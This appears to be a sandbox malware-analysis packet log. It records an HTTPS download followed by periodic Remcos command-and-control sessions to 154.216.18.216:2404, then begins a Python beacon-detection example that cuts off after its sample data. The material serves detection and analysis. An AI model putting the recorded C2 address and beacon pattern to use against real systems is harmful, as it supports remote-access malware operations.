                                          Dec 12, 2024 07:54:12.733778000 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:50.833339930 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:50.833381891 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:50.833882093 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:50.852693081 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:50.852709055 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:52.078533888 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:52.079057932 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:52.150836945 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:52.150847912 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:52.151333094 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:52.151422024 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:52.156208992 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:52.199327946 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:52.755817890 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:52.755978107 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:52.755990028 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:52.756036997 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:52.756259918 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:52.756347895 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:52.756978989 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:52.757066011 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:52.757071972 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:52.757158041 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:52.764403105 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:52.764470100 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:52.764487982 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:52.764596939 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:52.774529934 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:52.774838924 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:52.778860092 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:52.778996944 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:52.779005051 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:52.779195070 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:52.875150919 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:52.875267982 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:52.875286102 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:52.875447035 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:52.879400015 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:52.879467010 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:52.949395895 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:52.949516058 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:52.953383923 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:52.953444004 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:52.953510046 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:52.953577042 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:52.961688042 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:52.961740971 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:52.961838961 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:52.961885929 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:52.970047951 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:52.970148087 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:52.970261097 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:52.970307112 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:52.978616953 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:52.978718996 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:52.986622095 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:52.986716032 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:52.987159014 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:52.987258911 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:52.994916916 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:52.995038033 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:52.995052099 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:52.995172977 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.003289938 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.003367901 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.003572941 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.003662109 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.011754036 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.011924982 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.018080950 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.018142939 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.018229008 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.018381119 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.024199963 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.024279118 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.024394035 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.024440050 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.030450106 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.030587912 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.030846119 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.030934095 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.036652088 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.036746025 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.042798996 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.042884111 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.043179035 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.043219090 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.141472101 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.141603947 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.143781900 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.143838882 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.143970966 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.144048929 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.148669958 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.148817062 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.148849964 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.148958921 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.158130884 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.158277035 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.167166948 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.167325974 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.167336941 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.167490959 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.175555944 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.175674915 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.183689117 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.183768034 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.188235998 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.188328981 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.196171045 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.196238041 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.204282999 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.204427004 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.212373018 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.212516069 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.333865881 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.335062027 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.338661909 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.338772058 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.342082977 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.342473984 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.348764896 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.348917007 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.355092049 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.355185986 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.361705065 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.361815929 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.365143061 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.365228891 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.371712923 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.371917963 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.378161907 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.378314018 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.381683111 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.381817102 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.388112068 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.388178110 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.394695044 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.394803047 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.399643898 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.399825096 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.406354904 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.406488895 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.409698963 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.409852028 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.416311979 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.416412115 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.422692060 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.422796965 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.426218033 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.426281929 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.527374983 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.527564049 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.530308962 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.530415058 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.536111116 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.536216021 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.541344881 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.541462898 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.544231892 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.544358015 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.549300909 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.549432993 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.554433107 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.554579973 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.557054043 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.557218075 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.562035084 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.562191963 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.566905975 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.567069054 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.571933985 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.572073936 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.574573994 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.574754000 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.579593897 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.579705954 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.582129002 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.582201958 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.599759102 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.599770069 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.599801064 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.599845886 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.599858046 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.599977016 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.615984917 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.616003036 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.616097927 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.616106033 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.616230965 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.633575916 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.633595943 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.633774996 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.633784056 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.634119034 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.650907993 CET44349776172.67.216.143192.168.2.7
Dec 12, 2024 07:54:53.650926113 CET | 443 | 49776 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:53.651159048 CET | 49776 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:53.651170015 CET | 443 | 49776 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:53.651293039 CET | 49776 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:53.725198030 CET | 443 | 49776 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:53.725217104 CET | 443 | 49776 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:53.725311041 CET | 49776 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:53.725327015 CET | 443 | 49776 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:53.725388050 CET | 49776 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:53.738360882 CET | 443 | 49776 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:53.738377094 CET | 443 | 49776 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:53.738447905 CET | 49776 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:53.738462925 CET | 443 | 49776 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:53.738579988 CET | 49776 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:53.750683069 CET | 443 | 49776 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:53.750700951 CET | 443 | 49776 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:53.750839949 CET | 49776 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:53.750849009 CET | 443 | 49776 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:53.751025915 CET | 49776 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:53.760791063 CET | 443 | 49776 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:53.760809898 CET | 443 | 49776 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:53.760983944 CET | 49776 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:53.761003017 CET | 443 | 49776 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:53.761132002 CET | 49776 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:53.772567987 CET | 443 | 49776 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:53.772583008 CET | 443 | 49776 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:53.772680998 CET | 49776 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:53.772689104 CET | 443 | 49776 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:53.773027897 CET | 49776 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:53.775861025 CET | 443 | 49776 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:53.775958061 CET | 49776 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:53.775964975 CET | 443 | 49776 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:53.776021004 CET | 49776 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:53.782073021 CET | 443 | 49776 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:53.782088041 CET | 443 | 49776 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:53.782202005 CET | 49776 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:53.782208920 CET | 443 | 49776 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:53.782257080 CET | 49776 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:53.787575960 CET | 443 | 49776 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:53.787590027 CET | 443 | 49776 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:53.787715912 CET | 49776 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:53.787722111 CET | 443 | 49776 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:53.787770987 CET | 49776 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:53.910936117 CET | 443 | 49776 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:53.910959005 CET | 443 | 49776 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:53.911055088 CET | 49776 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:53.911063910 CET | 443 | 49776 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:53.911262035 CET | 49776 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:53.916637897 CET | 443 | 49776 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:53.916651964 CET | 443 | 49776 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:53.916775942 CET | 49776 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:53.916784048 CET | 443 | 49776 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:53.916904926 CET | 49776 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:53.922125101 CET | 443 | 49776 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:53.922138929 CET | 443 | 49776 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:53.922275066 CET | 49776 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:53.922281981 CET | 443 | 49776 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:53.923069000 CET | 49776 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:53.928318024 CET | 443 | 49776 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:53.928330898 CET | 443 | 49776 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:53.928458929 CET | 49776 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:53.928466082 CET | 443 | 49776 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:53.930996895 CET | 443 | 49776 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:53.931057930 CET | 49776 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:53.931062937 CET | 443 | 49776 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:53.931106091 CET | 49776 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:53.931106091 CET | 49776 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:53.936145067 CET | 443 | 49776 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:53.936214924 CET | 443 | 49776 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:53.936244965 CET | 49776 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:53.936249018 CET | 443 | 49776 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:53.936377048 CET | 49776 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:53.938196898 CET | 49776 | 443 | 192.168.2.7 | 172.67.216.143
Dec 12, 2024 07:54:53.938215017 CET | 443 | 49776 | 172.67.216.143 | 192.168.2.7
Dec 12, 2024 07:54:55.377141953 CET | 49786 | 2404 | 192.168.2.7 | 154.216.18.216
Dec 12, 2024 07:54:55.496479034 CET | 2404 | 49786 | 154.216.18.216 | 192.168.2.7
Dec 12, 2024 07:54:55.496602058 CET | 49786 | 2404 | 192.168.2.7 | 154.216.18.216
Dec 12, 2024 07:54:55.500344038 CET | 49786 | 2404 | 192.168.2.7 | 154.216.18.216
Dec 12, 2024 07:54:55.619641066 CET | 2404 | 49786 | 154.216.18.216 | 192.168.2.7
Dec 12, 2024 07:55:17.429605961 CET | 2404 | 49786 | 154.216.18.216 | 192.168.2.7
Dec 12, 2024 07:55:17.429699898 CET | 49786 | 2404 | 192.168.2.7 | 154.216.18.216
Dec 12, 2024 07:55:17.429780006 CET | 49786 | 2404 | 192.168.2.7 | 154.216.18.216
Dec 12, 2024 07:55:17.549339056 CET | 2404 | 49786 | 154.216.18.216 | 192.168.2.7
Dec 12, 2024 07:55:18.441293955 CET | 49841 | 2404 | 192.168.2.7 | 154.216.18.216
Dec 12, 2024 07:55:18.560630083 CET | 2404 | 49841 | 154.216.18.216 | 192.168.2.7
Dec 12, 2024 07:55:18.560837030 CET | 49841 | 2404 | 192.168.2.7 | 154.216.18.216
Dec 12, 2024 07:55:18.565927029 CET | 49841 | 2404 | 192.168.2.7 | 154.216.18.216
Dec 12, 2024 07:55:18.685297012 CET | 2404 | 49841 | 154.216.18.216 | 192.168.2.7
Dec 12, 2024 07:55:40.476829052 CET | 2404 | 49841 | 154.216.18.216 | 192.168.2.7
Dec 12, 2024 07:55:40.476958036 CET | 49841 | 2404 | 192.168.2.7 | 154.216.18.216
Dec 12, 2024 07:55:40.477103949 CET | 49841 | 2404 | 192.168.2.7 | 154.216.18.216
Dec 12, 2024 07:55:40.596323967 CET | 2404 | 49841 | 154.216.18.216 | 192.168.2.7
Dec 12, 2024 07:55:41.488226891 CET | 49894 | 2404 | 192.168.2.7 | 154.216.18.216
Dec 12, 2024 07:55:41.607728004 CET | 2404 | 49894 | 154.216.18.216 | 192.168.2.7
Dec 12, 2024 07:55:41.608026981 CET | 49894 | 2404 | 192.168.2.7 | 154.216.18.216
Dec 12, 2024 07:55:41.611166000 CET | 49894 | 2404 | 192.168.2.7 | 154.216.18.216
Dec 12, 2024 07:55:41.730675936 CET | 2404 | 49894 | 154.216.18.216 | 192.168.2.7
Dec 12, 2024 07:56:03.524431944 CET | 2404 | 49894 | 154.216.18.216 | 192.168.2.7
Dec 12, 2024 07:56:03.524506092 CET | 49894 | 2404 | 192.168.2.7 | 154.216.18.216
Dec 12, 2024 07:56:03.524589062 CET | 49894 | 2404 | 192.168.2.7 | 154.216.18.216
Dec 12, 2024 07:56:03.658327103 CET | 2404 | 49894 | 154.216.18.216 | 192.168.2.7
Dec 12, 2024 07:56:04.535070896 CET | 49946 | 2404 | 192.168.2.7 | 154.216.18.216
Dec 12, 2024 07:56:04.654534101 CET | 2404 | 49946 | 154.216.18.216 | 192.168.2.7
Dec 12, 2024 07:56:04.655386925 CET | 49946 | 2404 | 192.168.2.7 | 154.216.18.216
Dec 12, 2024 07:56:04.658328056 CET | 49946 | 2404 | 192.168.2.7 | 154.216.18.216
Dec 12, 2024 07:56:04.777766943 CET | 2404 | 49946 | 154.216.18.216 | 192.168.2.7
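The four connections to 154.216.18.216:2404 in the rows above follow one pattern: each carries a short request/reply exchange, sits idle for about 22 s, exchanges one more round, and is then replaced by a fresh connection from the next ephemeral port, roughly 23 s after the previous one opened. As an added example (not part of the Joe Sandbox report and not code from the sample), the Python below turns that observation into detection logic: it parses an abridged, hand-transcribed copy of the packet rows, derives one start time per TCP connection, and flags any server/port pair whose connection inter-arrival times are nearly constant on a port outside a small well-known set. The pipe-delimited sample rows, the well-known port list and the thresholds are choices made for this example.

```python
"""Periodic-connection (beacon) check over a Joe Sandbox style packet table.
Added example; the rows are an abridged, hand-transcribed copy of the
TCP packet table in the report (constructed sample, not a live capture)."""
import re
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed sample: timestamp | source port | dest port | source IP | dest IP.
# The 2404 rows are the four Remcos sessions from the table; the two 443
# rows are the tail of the earlier TLS download, included so the filter
# has a well-known port to ignore.
PACKET_ROWS = """\
Dec 12, 2024 07:54:53.938196898 CET|49776|443|192.168.2.7|172.67.216.143
Dec 12, 2024 07:54:53.938215017 CET|443|49776|172.67.216.143|192.168.2.7
Dec 12, 2024 07:54:55.377141953 CET|49786|2404|192.168.2.7|154.216.18.216
Dec 12, 2024 07:54:55.496479034 CET|2404|49786|154.216.18.216|192.168.2.7
Dec 12, 2024 07:55:17.429605961 CET|2404|49786|154.216.18.216|192.168.2.7
Dec 12, 2024 07:55:18.441293955 CET|49841|2404|192.168.2.7|154.216.18.216
Dec 12, 2024 07:55:18.560630083 CET|2404|49841|154.216.18.216|192.168.2.7
Dec 12, 2024 07:55:40.476829052 CET|2404|49841|154.216.18.216|192.168.2.7
Dec 12, 2024 07:55:41.488226891 CET|49894|2404|192.168.2.7|154.216.18.216
Dec 12, 2024 07:55:41.607728004 CET|2404|49894|154.216.18.216|192.168.2.7
Dec 12, 2024 07:56:03.524431944 CET|2404|49894|154.216.18.216|192.168.2.7
Dec 12, 2024 07:56:04.535070896 CET|49946|2404|192.168.2.7|154.216.18.216
Dec 12, 2024 07:56:04.654534101 CET|2404|49946|154.216.18.216|192.168.2.7
"""

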